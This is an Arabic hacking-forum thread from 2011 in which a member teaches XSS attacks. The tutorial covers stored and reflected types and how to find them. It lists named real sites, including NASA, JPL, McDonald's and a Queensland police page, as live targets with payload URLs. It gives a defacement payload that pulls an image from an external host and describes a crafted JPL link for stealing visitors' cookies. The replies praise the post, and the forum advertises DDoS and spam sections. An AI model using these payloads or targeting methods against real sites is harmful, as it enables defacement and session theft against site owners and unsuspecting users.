تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



.:: قسم الثغرات ::. هذا القسم يختص باحدث الثغرات و طرق استغلالها ..

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية TKL
TKL
v!p
TKL غير متواجد حالياً
 
رقم العضوية : 22361
تاريخ التسجيل : Sep 2011
مكان الإقامة :
عدد المشاركات : 2,301
عدد النقاط : 10
قوة التقييم :
.::أَنْتِ الْجَمَاعَةُ وَلَوْ كُنْتُ وَحَدَّكَ ::.
افتراضي :::: ثغرات xss انواعها & كيف نكتشفها & كيف نبحث عنها ::::

كُتب : [ 10-20-2011 - 08:00 PM ]


السلام عليكم اخواني



سبق وان وضحنا عن هذه الثغره وبعض استخداماتها للمبتدئين والمحترفين لكن اليوم ان شاء الله سنتعمق فيها اكثر لنتعرف على انواعها و طريقه اكتشافها و اسلوب البحث عنها .




اولا : انواعها


الاصابه الداخليه : وهي اخطر انواعها لانه تسمح لك بزرع الكود الخاص فيك في الصفحه بشكل دائم

بحيث ان اي شخص يدخل ل الصفحه تنفذ عنده هذه الاكواد ,.


الاصابه الخارجيه : هي اقل خطوره من سابقتها ولكن منتشره بشكل اكبر وخصوصا في المواقع الكبيره ومن خلالها تستطيع زرع الكود الخاص بك بشكل مؤقت في الروابط او في حقول البحث ..




ثانيا: طرق اكتشافها


الاصابه الداخليه : يسهل اكتشاف هذه الثغره وذالك من خلال وضع اوامر الاكتشاف في اي مكان يسمح لك بوضع معلومات دائمه مثل التعليق على المدونه او انشاء موضوع جديد او اي مكان اخر .

* اوامر الاكتشاف موجوده في المرفقت لان المنتدى يحضر بعض الكلمات .


الاصابه الخارجيه : هنا يمكنك وضع اوامرك في اي مكان يسمح لك بإرسال معلومات للصفحه مثلا الروابط او حقول البحث او اي مكان اخر .


بعض المواقع المصابه بهذا النوع :

1-هذا الموقع مصاب في حقل البحث وهو موقع السيستاني لعنه الله (مكتشف الثغره اخونا
الغضب )

ادخل هنا

http://www.sistani.org/index.php?p=121643
وضع في خانه البحث اي امر من اوامر اكتشاف الثغره (موجوده في المرفقات )
ولاحظ تجاوب الموقع معك .

2- هذا الموقع مصاب في الرابط وهو موقع ناسا (nasa.gov)

ادخل هنا



ولاحظ في نهايه الرابط هذا الامر :

كود PHP:
"><center><h1>Gaza HaCKeR Team<%2Fh1><%2Fcenter><center><IMG+SRC%3D"http%3A//www.hebergeur-images.fr/images/1132327819.jpg"> 
وهو كود HTML و جافا سكربت ويمكنك استبداله باي كود تريده لكن يجب عليك تشفيره من هنا :
URL encode



كيف تستفيد من الاصابات الخارجيه :

طبعا مميزه هذا النوع كما قلنا انه منتشر في المواقع الكبيره الموثوق منها فإن نشرت رابط لاحد هذه المواقع لن يشك فيه احد لان الموقع مشهور .

ناخذ مثال ع موقع ناسا :

هذا رابط كل من يدخل عليه احصل على الكوكيز الخاصه فيه و كثير من المعلومات المهمه :
https://careerlaunch.jpl.nasa.gov/ci...E%3C/script%3E
شو رايك هل هذا الرابط يثير لك الشك في الاغلب لا لانه من موقع مشهور وموثوق فيه .
*هون لغمنا باستخدان شل G.H.T XSS SHELL


ثالثا: طرق البحث عنها


ثغرات XSS مثل اي ثغره اخرى لها الدروك الخاص بها وايضا منتشره بشكل كبير في مواقع الثغرات

انت ادخل لاي موقع متخصص في الثغرات وابحث عن XSS وستجد الكثير من النتائج .



مواقع مصابه للتدريب(كلها مواقع من الدرجه الاولى انتبه ل اسم الموقع ) :



http://www.jevon.org/wiki/search.php...TKL%3C%2Fh1%3E


****

http://www.siliconvalley.com/circare...;%3C/SCRIPT%3E

****

http://www.mcdonalds.com/us/en/food/...;%3C/SCRIPT%3E

****

http://www.police.qld.gov.au/station...archbtn=Search


اخيرا هذه مواقع للبحث عن ثغره XSS :

1- http://www.domxssscanner.com/
2- http://xss-scanner.com/

ايضا يمكنك استخدام برنامج Acunetix Web Vulnerability Scanner للبحث عن الثغره .

الملفات المرفقة
نوع الملف: txt CODE.txt‏ (117 بايت, المشاهدات 311)
توقيع : TKL




./اذا استفدت من موضوعي او تعليقي لا تشكرني بل إدعو لوالدتي بالشفاءادخل هنا

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 2 )
zaradusht

رقم العضوية : 23023
تاريخ التسجيل : Oct 2011
مكان الإقامة :
عدد المشاركات : 719
عدد النقاط : 10

zaradusht غير متواجد حالياً

افتراضي

كُتب : [ 10-20-2011 - 08:11 PM ]


السلام على أهل العلم
بارك الله فيك و جزاك ألف خير
و جعل في ذريتك صلاحا
و أذر على الوالدة الغالية بالصحة و العافية و طول العمر
ردي هذا ليس على الموضوع بحد ذاته
بل على طريقة تعاملك مع الإخوان و كذالك
في سرد المواضيع و تبسيطها بالإضافة إلى المساهة
في تثقيف الشباب العربي
الذي بالعفل يحتاج إلا أمثالكم ليستطيع مواكبة الركب الجاري للتطور
جعل الله أعمالك في ميزان حسناتك
فصراحة إستفدة في مدة لاتزيد عن 20 يوما أشياء كثيرة
من هذا المنتدى
بارك الله فيكم جميعا


لي عودة لمراجعة الشرح


توقيع : zaradusht

.:: فريق قراصنة غزة ::.

رد مع إقتباس
الأعضاء الذين آرسلوا آعجاب لـ zaradusht على المشاركة المفيدة:
rezaa (04-26-2014)
بياناتي
 رقم المشاركة : ( 3 )
hamdix
v!p
رقم العضوية : 21564
تاريخ التسجيل : Aug 2011
مكان الإقامة :
عدد المشاركات : 1,450
عدد النقاط : 10

hamdix غير متواجد حالياً

افتراضي

كُتب : [ 10-20-2011 - 09:04 PM ]


تسلم ياغالي شرح جميل و واضح,بارك الله فيك

توقيع : hamdix

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
قراصنة غزة
# لا إلـہ إلا اللَّـــہ محمد رسول اللَّـــہ #
رقم العضوية : 6102
تاريخ التسجيل : Jan 2010
مكان الإقامة :
عدد المشاركات : 13,618
عدد النقاط : 10

قراصنة غزة غير متواجد حالياً

# Electronic Jihadist #

افتراضي

كُتب : [ 10-20-2011 - 09:13 PM ]


يسلمو اخي tkl شرح مهم ومبسط
سلمت يمناك وبارك الله فيك وشفا والدتك


توقيع : قراصنة غزة

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
FOXY
مشرف
رقم العضوية : 7448
تاريخ التسجيل : Feb 2010
مكان الإقامة :
عدد المشاركات : 2,183
عدد النقاط : 10

FOXY غير متواجد حالياً

اللهم زدني علماً
‏FoXy SecUritY
افتراضي

كُتب : [ 10-20-2011 - 10:15 PM ]


تسلم يااا كبير
ننتظر الجديد منك


توقيع : FOXY

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
Mr.CaRnIvOrE

رقم العضوية : 12542
تاريخ التسجيل : Aug 2010
مكان الإقامة :
عدد المشاركات : 469
عدد النقاط : 10

Mr.CaRnIvOrE غير متواجد حالياً

Mr.AlGeRiA

افتراضي

كُتب : [ 10-20-2011 - 10:29 PM ]


شكرا لك .. مواضيع ماشاء الله


توقيع : Mr.CaRnIvOrE

i4M aLg3rIan

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 7 )
youma

رقم العضوية : 23135
تاريخ التسجيل : Oct 2011
مكان الإقامة :
عدد المشاركات : 4
عدد النقاط : 10

youma غير متواجد حالياً

افتراضي

كُتب : [ 10-21-2011 - 12:00 AM ]


شكرا لك و لكلّ اعضاء هذا المنتدى اللّذين لم يحتكرو المعرفة بل ساهمو في نشرها


توقيع : youma

.:: فريق قراصنة غزة ::.

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
انواعها, ثغرات, عنها, xss, وبيت, نكتشفها, كيف


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
جميع سروحات اختراق المواقع تفضل هنا فاصل ومواصل ::. قسم إختراق المواقع والمنتديات .:: 47 07-11-2014 09:48 PM
مجموعة دوراات اختراق مواقع (تجميع) xmayaroos خاص بشروحات الفيديو 34 02-14-2013 02:38 AM
سودة بنت زمعة رضي الله عنها قراصنة غزة قسم الدفاع عن النبي محمد والصحابة وآل البيت 1 06-23-2011 10:20 AM
الطريق إلى موقعة الجمل قراصنة غزة قسم الدفاع عن النبي محمد والصحابة وآل البيت 0 06-20-2011 08:48 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 07:35 AM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @ قسم الحقن المٌتقَدِّم [بداية العهد] @